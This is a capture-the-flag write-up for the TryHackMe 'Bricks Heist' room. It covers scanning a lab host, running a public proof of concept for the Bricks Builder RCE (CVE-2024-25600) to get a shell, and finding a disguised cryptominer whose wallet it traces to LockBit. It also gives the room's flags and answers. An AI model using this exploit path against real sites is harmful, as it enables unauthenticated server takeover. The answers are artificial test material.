TryHack3M: Bricks Heist (TryHackMe) - CVE-2024-25600 (Bricks Builder RCE) & OSINT - crypto wallets
Introduction
TryHack3M: Bricks Heist is a TryHackMe challenge centered on two core skills: exploiting a known CVE in a WordPress plugin and performing blockchain OSINT to trace a threat actor. The scenario follows a compromised web server belonging to Brick Press Media Co., where our job is to hack back in, understand what happened, and identify who was behind it.
The primary attack vector is CVE-2024-25600, an unauthenticated Remote Code Execution vulnerability affecting Bricks Builder ≤ 1.9.6 — a popular WordPress page builder theme. The flaw exists in the /wp-json/bricks/v1/render_element REST API endpoint, which fails to properly restrict PHP code execution. An attacker can abuse this without any credentials to achieve full server-level code execution.
Once inside, the challenge shifts to threat intelligence and blockchain OSINT — tracing a Bitcoin wallet found in a cryptominer's log file back to a sanctioned ransomware group using public blockchain explorers and OFAC records.
Tools used: nmap, gobuster, curl, CVE-2024-25600 PoC (Python), CyberChef, Blockchain Explorer
OWASP Mapping: A06:2021 – Vulnerable and Outdated Components CWE: CWE-94 – Improper Control of Generation of Code ('Code Injection')
Challenge
From Three Million Bricks to Three Million Transactions!
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.
Can you hack back the server and identify what happened there?
Note: Add MACHINE_IP bricks.thm to your /etc/hosts file.
Answer the questions below
What is the content of the hidden .txt file in the web folder? THM{fl46_650c844110baced87e1606453b93f22a}
nano /etc/hosts
nmap -sV -p- bricks.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-24 18:22 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for bricks.thm (10.114.165.204)
Host is up (0.0059s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http WebSockify Python/3.8.10
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3306/tcp open mysql MySQL (unauthorized)
gobuster dir -u https://bricks.thm -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://bricks.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 199]
/.hta (Status: 403) [Size: 199]
/.hta.php (Status: 403) [Size: 199]
/.hta.html (Status: 403) [Size: 199]
/.hta.txt (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htaccess.php (Status: 403) [Size: 199]
/.htaccess.html (Status: 403) [Size: 199]
/.htaccess.txt (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/.htpasswd.html (Status: 403) [Size: 199]
/.htpasswd.php (Status: 403) [Size: 199]
/.htpasswd.txt (Status: 403) [Size: 199]
/0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/]
/admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
/atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
/b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/br (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/cgi-bin/.html (Status: 403) [Size: 199]
/dashboard (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
/embed (Status: 301) [Size: 0] [--> https://bricks.thm/embed/]
/favicon.ico (Status: 302) [Size: 0] [--> https://bricks.thm/wp-includes/images/w-logo-blue-white-bg.png]
/feed (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
/index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
/license.txt (Status: 200) [Size: 19915]
/login.php (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
/login (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> https://bricks.thm/]
/phpmyadmin (Status: 301) [Size: 238] [--> https://bricks.thm/phpmyadmin/]
/rdf (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
/readme.html (Status: 200) [Size: 7401]
/robots.txt (Status: 200) [Size: 67]
/robots.txt (Status: 200) [Size: 67]
/rss (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/rss2 (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/s (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/S (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sa (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sam (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sample (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/server-info (Status: 403) [Size: 199]
/server-status (Status: 403) [Size: 199]
/wp-admin (Status: 301) [Size: 236] [--> https://bricks.thm/wp-admin/]
/wp-app.php (Status: 403) [Size: 0]
/wp-atom.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
/wp-config.php (Status: 200) [Size: 0]
/wp-commentsrss2.php (Status: 301) [Size: 0] [--> https://bricks.thm/comments/feed/]
/wp-content (Status: 301) [Size: 238] [--> https://bricks.thm/wp-content/]
/wp-cron.php (Status: 200) [Size: 0]
/wp-feed.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-includes (Status: 301) [Size: 239] [--> https://bricks.thm/wp-includes/]
/wp-links-opml.php (Status: 200) [Size: 227]
/wp-load.php (Status: 200) [Size: 0]
/wp-login.php (Status: 200) [Size: 4042]
/wp-mail.php (Status: 403) [Size: 2478]
/wp-rdf.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
/wp-rss.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-register.php (Status: 301) [Size: 0] [--> https://bricks.thm/wp-login.php?action=register]
/wp-settings.php (Status: 500) [Size: 0]
/wp-rss2.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-signup.php (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php?action=register]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
According to Claude:
This is almost certainly running Bricks Builder (a WordPress page builder). There's a well-known critical RCE vulnerability: CVE-2024-25600 — an unauthenticated remote code execution in Bricks Builder ≤ 1.9.6.
curl -k https://bricks.thm/wp-content/themes/bricks/style.css 2>/dev/null | head -5
/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Author: Bricks
Author URI: https://bricksbuilder.io/
In the next step, I used this Python script FROM CVE-2024-25600. You'll have to copy it and create a Python script to exploit
- Remember, for this step to pass, you have to add the
bricks.thmto/etc/hosts
nano script.py
python3 exploit.py -u https://bricks.thm
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}
What is the name of the suspicious process? nm-inet-dialog
find /lib/NetworkManager/ -type f 2>/dev/null
/lib/NetworkManager/nm-openvpn-auth-dialog
/lib/NetworkManager/nm-pptp-auth-dialog
/lib/NetworkManager/nm-initrd-generator
/lib/NetworkManager/nm-dispatcher
/lib/NetworkManager/VPN/nm-pptp-service.name
/lib/NetworkManager/VPN/nm-openvpn-service.name
/lib/NetworkManager/nm-iface-helper
/lib/NetworkManager/conf.d/10-globally-managed-devices.conf
/lib/NetworkManager/conf.d/no-mac-addr-change.conf
/lib/NetworkManager/conf.d/10-dns-resolved.conf
/lib/NetworkManager/nm-openvpn-service
/lib/NetworkManager/nm-dhcp-helper
/lib/NetworkManager/nm-pptp-service
/lib/NetworkManager/nm-openvpn-service-openvpn-helper
/lib/NetworkManager/nm-inet-dialog
/lib/NetworkManager/inet.conf
What is the service name affiliated with the suspicious process? ubuntu.service
Shell> systemctl | grep running
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
acpid.path loaded active running ACPI Events Check
init.scope loaded active running System and Service Manager
session-c1.scope loaded active running Session c1 of user lightdm
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
atd.service loaded active running Deferred execution scheduler
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
badr.service loaded active running Badr Service
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
httpd.service loaded active running LSB: starts Apache Web Server
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
lightdm.service loaded active running Light Display Manager
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
mysqld.service loaded active running LSB: start and stop MySQL
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager.service loaded active running Network Manager
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
serial-getty@ttyS0.service loaded active running Serial Getty on ttyS0
snap.amazon-ssm-agent.amazon-ssm-agent.service loaded active running Service for snap application amazon-ssm-agent.amazon-ssm-agent
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
ubuntu.service loaded active running TRYHACK3M
udisks2.service loaded active running Disk Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user@1000.service loaded active running User Manager for UID 1000
user@114.service loaded active running User Manager for UID 114
whoopsie.service loaded active running crash report submission daemon
wpa_supplicant.service loaded active running WPA supplicant
acpid.socket loaded active running ACPID Listen Socket
avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket
cups.socket loaded active running CUPS Scheduler
dbus.socket loaded active running D-Bus System Message Bus Socket
multipathd.socket loaded active running multipathd control socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-networkd.socket loaded active running Network Service Netlink Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
What is the log file name of the miner instance? inet.conf
cat /lib/NetworkManager/inet.conf
2024-04-11 10:54:02,579 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-01 15:36:36,211 [*] confbak: Ready!
2025-11-01 15:36:36,211 [*] Status: Mining!
2025-11-01 15:36:40,214 [*] Miner()
2025-11-01 15:36:40,214 [*] Bitcoin Miner Thread Started
2025-11-01 15:36:40,214 [*] Status: Mining!
2025-11-01 15:36:42,216 [*] Miner()
2025-11-01 15:48:50,641 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-01 15:49:57,403 [*] confbak: Ready!
2025-11-01 15:49:57,404 [*] Status: Mining!
2025-11-01 15:50:01,412 [*] Miner()
2025-11-01 15:50:01,412 [*] Bitcoin Miner Thread Started
2025-11-01 15:50:01,412 [*] Status: Mining!
2025-11-01 15:50:57,520 [*] Miner()
2025-11-01 15:50:59,522 [*] Miner()
2025-11-01 15:51:01,524 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-05 21:57:43,607 [*] confbak: Ready!
2025-11-05 21:57:43,607 [*] Status: Mining!
2025-11-05 21:57:47,612 [*] Miner()
2025-11-05 21:57:47,612 [*] Bitcoin Miner Thread Started
2025-11-05 21:57:47,612 [*] Status: Mining!
What is the wallet address of the miner instance? bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
The wallet address used has been involved in transactions between wallets belonging to which threat group? LockBit
The wallet
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qatransacted withbc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r, which is sanctioned by the US Treasury OFAC and linked to the LockBit ransomware group.You can verify at:
https://ofac.treasury.gov/recent-actions/20240220
Conclusion
This challenge demonstrated how a single unpatched plugin can serve as the entry point for a full server compromise. CVE-2024-25600 is particularly dangerous because it requires zero authentication — any exposed WordPress site running Bricks Builder ≤ 1.9.6 is vulnerable to complete RCE with a single POST request.
Once inside, we discovered the attacker had deployed a Bitcoin cryptominer disguised as a legitimate NetworkManager binary (nm-inet-dialog), persisted via a systemd service (ubuntu.service), and logged mining activity to /lib/NetworkManager/inet.conf. Decoding the obfuscated wallet ID using hex and base64 revealed a Bitcoin address that, when traced through blockchain OSINT and cross-referenced against OFAC sanctions records, linked the attacker's infrastructure to the LockBit ransomware group.
Key takeaways:
Always keep WordPress themes and plugins updated — CVE-2024-25600 had a patch available
Cryptominers often masquerade as system binaries to avoid detection
Blockchain transactions are pseudonymous, not anonymous — OSINT can trace wallets to known threat actors through public sanction databases like OFAC
